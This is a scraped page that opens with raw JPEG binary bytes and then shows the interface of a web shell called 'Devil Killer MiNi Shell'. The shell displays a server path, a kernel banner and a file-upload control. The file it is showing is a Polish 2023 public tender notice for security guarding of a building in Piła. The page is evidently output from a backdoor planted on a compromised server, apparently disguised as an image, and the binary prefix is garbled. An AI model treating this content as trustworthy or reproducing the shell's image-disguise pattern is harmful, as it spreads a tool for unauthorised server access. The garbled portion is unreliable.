JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231219/0056226701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Bezpośrednia ochrona fizyczna nieruchomości przy ul. Dąbrowskiego 8 w Pile </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PILSKIE TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570838925</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. gen. Sikorskiego 82A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piła</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-920</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">67/349-00-48</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">techniczny@pilskietbs.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pilskietbs.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka z o.o. </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bezpośrednia ochrona fizyczna nieruchomości przy ul. Dąbrowskiego 8 w Pile </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8c1478c3-9e78-11ee-948d-82b0c04ef850</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00562267</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00029746/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Bezpośrednia ochrona fizyczna nieruchomości przy ul. Dabrowskiego 8 w Pile.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8c1478c3-9e78-11ee-948d-82b0c04ef850 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych - Dziennik Urzędowy UE L 119 - RODO) przyjmuję do wiadomości, że : <br/>1)	Administratorem moich danych osobowych przetwarzanych w celach związanych z zawarciem niniejszej Umowy jest Pilskie Towarzystwo Budownictwa Społecznego Spółka z o.o. - siedziba: 64-920 Piła, ul. Sikorskiego 82A.<br/>2)	Dotyczące mnie dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji przez Pilskie TBS Sp. z o.o., w tym profilowaniu.<br/>3)	Przysługują mi prawa:<br/>•	dostępu do dotyczących mnie danych oraz otrzymania ich kopii,<br/>•	sprostowania (poprawiania) danych,<br/>•	usunięcia danych (zgodnie z uwarunkowaniami określonymi w art. 17 RODO), <br/>•	do ograniczenia przetwarzania danych,<br/>•	do przenoszenia danych (zgodnie z uwarunkowaniami określonymi w art. 20 RODO),<br/>•	wniesienia sprzeciwu wobec przetwarzania danych,<br/>•	wniesienia skargi do organu nadzorczego, o którym mowa w art. 4 pkt 21 RODO, tj. Prezesa Urzędu Ochrony Danych Osobowych.<br/>4)	Pilskie TBS Sp. z o.o., jako administrator danych osobowych, zgodnie z przepisami prawa gospodarczego oraz przepisami właściwymi w sprawach postępowania na wypadek zaistnienia określonych prawem roszczeń przechowywał będzie dotyczące mnie dane osobowe związane z zawarciem i obsługą Umowy przez okres 6 lat od momentu jej zakończenia. <br/>5)	Dotyczące mnie dane osobowe mogą zostać udostępnione podwykonawcom związanym ze Spółką umowami powierzenia przetwarzania danych osobowych, np. kancelarie radców prawnych, firmy informatyczne, biuro rachunkowo-podatkowe. <br/>6)	Podanie danych osobowych do niniejszej Umowy ma charakter dobrowolny, niemniej jest warunkiem koniecznym do jej zawarcia i wykonania.<br/>7)	Pilskie TBS Sp. z o.o. wyznaczył Inspektora Ochrony Danych, z którym można skontaktować się: <br/>•	telefonicznie: 67/ 349-00-48, 349-00-78<br/>•	pocztą tradycyjną: na adres ul. Sikorskiego 82a, 64-920 Piła<br/>•	pocztą elektroniczną: na adres e-mail sekretariat@pilskietbs.pl</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">RODO (ograniczenia stosowania): Skorzystanie przez osobę, której dane osobowe dotyczą z uprawnienia do sprostowania lub uzupełnienia, o których mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania , o których mowa w art.18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Bezpośrednia ochrona fizyczna nieruchomości przy ul. Dąbrowskiego 8 w Pile”<br/>1.	Przedmiot zamówienia (nazwa):<br/>1.	NAZWA: ochrona fizyczna osób i mienia Pilskiego TBS Sp. z o.o. przy ulicy Dąbrowskiego 8 w Pile,<br/>2.	PRZEDMIOT: Ochrona fizyczna osób i mienia Pilskiego TBS Sp. z o.o. budynku przy ulicy Dąbrowskiego 8 w Pile, przeznaczonego na wynajem lokali użytkowych oraz Centrum Konferencyjnego wraz z terenem przyległym do budynku.<br/>2.	OPIS PRZEDMIOTU ZAMÓWIENIA, WARUNKI:<br/>2.1.	Ochrona budynku realizowana na posterunku stałym 7 dni w tygodniu: <br/>2.1.1.	Od poniedziałku do piątku w godzinach od 15:00 do 7:00 dnia następnego<br/>2.1.2.	Weekendy i święta, dni ustawowo wolne od pracy całodobowo przez jednego kwalifikowanego pracownika ochrony fizycznej na zmianie.<br/>Do wykonywania usługi ochrony wykonawca skieruje odpowiednią liczbę osób (pracowników ochrony) w celu zapewnienia ciągłości ochrony przy jednoczesnym uwzględnieniu przepisów kodeksu pracy w zakresie ilości godzin pracy i wypoczynku. Wykonawca ponosi pełną odpowiedzialność za organizację pracy pracowników zgodnie z obowiązującymi przepisami prawa pracy i bhp.<br/>2.2.	Ochrona będzie realizowana również przez grupę interwencyjną składającą się z co najmniej jednego kwalifikowanego pracownika ochrony fizycznej, umundurowanego, na wezwanie pracownika ochrony posterunku stałego. Zadaniem Grupy Interwencyjnej jest dotarcie do budynku w jak najkrótszym czasie (nie dłuższym niż 20 minut od chwili wezwania) oraz podjęcie działań, mających na celu ochronę życia, zabezpieczenia mienia oraz ujęcie sprawców czynów przestępczych. <br/>2.3.	Zamówienie obejmuje swoim zakresem następujące czynności:<br/>2.3.1.	Prowadzenia ochrony fizycznej na terenie budynku chronionego 7 dni<br/>w tygodniu: od poniedziałku do piątku w godzinach od 15:00 – 7:00 dnia następnego oraz weekendy, święta i dni ustawowo wolne od pracy całodobowo.<br/>2.3.2.	Prowadzenie działań prewencyjnych, zmierzających do zapobiegania kradzieży, kradzieży z włamaniem, zniszczeniu i dewastacji mienia. Wykonawca zobowiązany będzie do podejmowania wszelkich niezbędnych działań zapobiegających przestępstwom przeciwko mieniu Zamawiającego oraz przeciwdziałających powstawaniu szkód wynikających z tych zdarzeń, a nadto niedopuszczania do wstępu osób nieuprawnionych na teren chroniony. Działania te obejmują również majątek dzierżawców wynajmujących pomieszczenia od Zamawiającego w budynku przy ulicy Dąbrowskiego 8<br/>2.3.3.	Zapewnienie bezpieczeństwa pracownikom i klientom Zamawiającego oraz dzierżawcom wynajmującym pomieszczenia od Zamawiającego,<br/>2.3.4.	Przeciwdziałania aktom terroru, dywersji, sabotażu oraz zakłóceniom porządku publicznego na terenie chronionego budynku,<br/>2.3.5.	Niedopuszczenie do filmowania i fotografowania budynku Zamawiającego bez wymaganego zezwolenia,<br/>2.3.6.	Bezzwłoczne informowanie Zamawiającego o zdarzeniach, które mogą mieć wpływ na bezpieczeństwo budynku Zamawiającego i osób przebywających na jego terenie,<br/>2.3.7.	Stała kontrola i bieżące informowanie Zamawiającego o wszelkich przypadkach uszkodzeń środków zabezpieczenia technicznego budynku (zabezpieczeń budowlanych, mechanicznych<br/>i elektronicznych) oraz punktów oświetleniowych znajdujących się na chronionym terenie,<br/>2.3.8.	Zgłaszanie zakłóceń lub nieprawidłowości funkcjonowania lokalnego systemu alarmowego, a w szczególności gdy zakłócenie uniemożliwia prawidłowy odbiór sygnałów z monitorowanego budynku, niezwłocznie lub w najbliższym dniu pracy Zamawiającego, wraz z adnotacją w książce służby,<br/>2.3.9.	Współdziałania w działaniu zadań ochronnych z jednostkami ochrony przeciwpożarowej, w szczególności podejmowania działań ochronnych<br/>i zabezpieczających w przypadku wystąpienia w granicach chronionego budynku i terenu, klęski żywiołowej lub innego zagrożenia,<br/>2.3.10.	Przestrzeganie oraz egzekwowanie przestrzegania przepisów<br/>i obowiązujących procedur od osób przebywających na terenie chronionego budynku,<br/>2.3.11.	Jak najszybsze wychwytywanie pożarów i innych zagrożeń i zdarzeń przestępczych i wykroczeń, jeżeli będą miały miejsce i informowania o nich właściwych służb oraz Zamawiającego,<br/>2.3.12.	Obsługa Systemu Sygnalizacji Napadu i Włamania oraz systemu telewizji przemysłowej dostarczanej przez Zamawiającego,<br/>2.3.13.	Stały dozór sygnałów przesłanych, gromadzonych i przetwarzanych w elektronicznych urządzenia systemowych,<br/>2.3.14.	Współdziałanie w zakresie zabezpieczenia budynku z właściwymi służbami (Policja, Straż Pożarna, inne formacje),<br/>2.3.15.	Kontrolowanie ruchu osobowego, kołowego i materiałowego na terenie budynku chronionego,<br/>2.3.16.	Obsługa interesantów (wydawanie/odbieranie kluczy do pomieszczeń centrum konferencyjnego wraz z protokołem zdawczo-odbiorczym),<br/>2.3.17.	Stała współpraca z kierownikiem i pracownikami Działu Dąbrowskiego 8, w zakresie prawidłowego funkcjonowania budynku,<br/>2.4.	Pracownicy Wykonawcy, realizujący zamówienie zobowiązani będą do:<br/>2.4.1.	Znajomości i stosowania obowiązującej na terenie chronionym Instrukcji Bezpieczeństwa Pożarowego, Planu Ochrony,<br/>2.4.2.	Utrzymania w czystości i porządku posterunku stałego,<br/>2.5.	Wykonawca na własny koszt podłączy lokalny system alarmowy<br/>w chronionym budynku do stacji monitorowania alarmów Wykonawcy oraz zapewni dozorowanie przez stację monitorowania alarmów pochodzących<br/>z lokalnego systemu alarmowego, poprzez przyjmowanie sygnałów<br/>i przekazywanie informacji o nich Zamawiającemu a w razie potrzeby Policji<br/>i Straży Pożarnej,<br/>2.5.1.	Podłączenie monitorowania sygnałów alarmowych do siedziby Wykonawcy nastąpi w terminie 2 dni roboczych od dnia przekazania przez Zamawiającego terenu objętego ochroną<br/>2.5.2.	Wykonawca będzie reagował w trybie natychmiastowym na wszelkie sygnały alarmowe przekazywane z budynku objętego ochroną,<br/>2.6.	Zamawiający wymaga, aby pracownicy wyznaczeni do realizacji ochrony fizycznej na posterunku stałym oraz w grupie interwencyjnej posiadali wpis na listę kwalifikowanych pracowników ochrony fizycznej, zgodnie z ustawa z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tj. Dz.U. z 2021 poz. 1995.). <br/>2.7.	Ponadto pracownicy wyznaczeni do realizacji ochrony fizycznej na posterunku stałym powinni posiadać umiejętność obsługi komputera,<br/>2.8.	Wykonawca zapewni pracownikom ochrony jednolite, estetyczne umundurowanie z identyfikatorem (identyfikator musi posiadać nazwę lub logo firmy , imię i nazwisko pracownika ochrony), oraz środki ochrony osób i mienia umożliwiające prawidłowe wykonywanie umowy,<br/>2.9.	Wykonawca powinien wyposażyć Grupę Interwencyjną w odpowiednie środki ochrony.<br/>2.10.	Wykonawca zobowiązany będzie do posiadania polisy ubezpieczeniowej od odpowiedzialności cywilnej w zakresie prowadzonej działalności z zakresu osób i mienia przez okres obowiązywania umowy i na żądanie Zamawiającego przedkładania jej do wglądu, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-02-01 do 2025-01-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z pkt.28 swz</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a) posiadanie wiedzy i doświadczenia – wymóg: zrealizowana 1 usługa na fizyczną ochronę mienia przez okres minimum 1 roku o wartości nie mniejszej niż 150.000,00 zł brutto<br/> W przypadku złożenia oferty wspólnej należy wykazać spełnianie warunków łącznie. <br/>Ocena spełniania warunków wg zasady: spełnia/nie spełnia.<br/>b) sytuacja ekonomiczna i finansowa – wymóg : ubezpieczenie Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości zapewniającej pokrycie szkód, nie mniej niż 200 000,00 zł. <br/>W przypadku złożenia oferty wspólnej należy wykazać spełnianie warunku łącznie. <br/>Ocena spełniania warunków wg zasady: spełnia/nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a)	oświadczenie o braku podstaw do wykluczenia na podstawie art.125 ust.1 ustawy Pzp – druk - załącznik Nr 3 do SWZ,<br/><br/>b)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 109 ust.1 pkt.4 ustawy Pzp, wystawiony nie wcześniej niż 3 miesiąc przed upływem terminu składania ofert (aktualna koncesja na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia)<br/>	Wykonawca nie jest zobowiązany do złożenia tego dokumentu, jeżeli zamawiający może go uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>c)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat , w zakresie art.109 ust.1 pkt.1 ustawy Pzp lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu – wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,<br/><br/>d)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne w zakresie art.109 ust.1 pkt.1 ustawy Pzp lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu – wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,<br/><br/>Wykonawca powołujący się przy wykazaniu spełnienie warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla Wykonawcy.<br/>W przypadku złożenia oferty wspólnej warunki wyszczególnione w pkt a, b, c, d muszą spełnić wszyscy Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 112 ust 2. ustawy Pzp – druk załącznik - Nr 2 do SWZ. W przypadku złożenia oferty wspólnej oświadczenia muszą złożyć wszyscy wykonawcy.<br/>b)	Wykazu usług wykonanych w okresie 3 lat przed datą składania ofert z podaniem ich rodzaju, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego (referencje ,poświadczenie), że usługi zostały wykonane należycie. W przypadku złożenia oferty wspólnej należy wykazać spełnienia warunku łącznie – druk - załącznik Nr 4 do SWZ,<br/>c)	opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. W przypadku złożenia oferty wspólnej należy wykazać spełnianie warunku łącznie.<br/>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z innymi stosunków. Wykonawca w takiej sytuacji<br/>zobowiązany jest udowodnić zamawiającemu , iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.<br/>Podmiot , który zobowiązał się do udostępnienia zasobów odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą w skutek nieudostępnienia tych zasobów, chyba, że za nieudostępnienie zasobów nie ponosi winy.<br/>Wykonawca , który będzie dysponował zasobami innych podmiotów do pisemnego zobowiązania dołącza dokumenty potwierdzające spełnienie warunków udziału w postępowaniu innego podmiotu<br/>w zakresie wymaganym od Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykaz wykonywanych usług (załącznik Nr 5 do 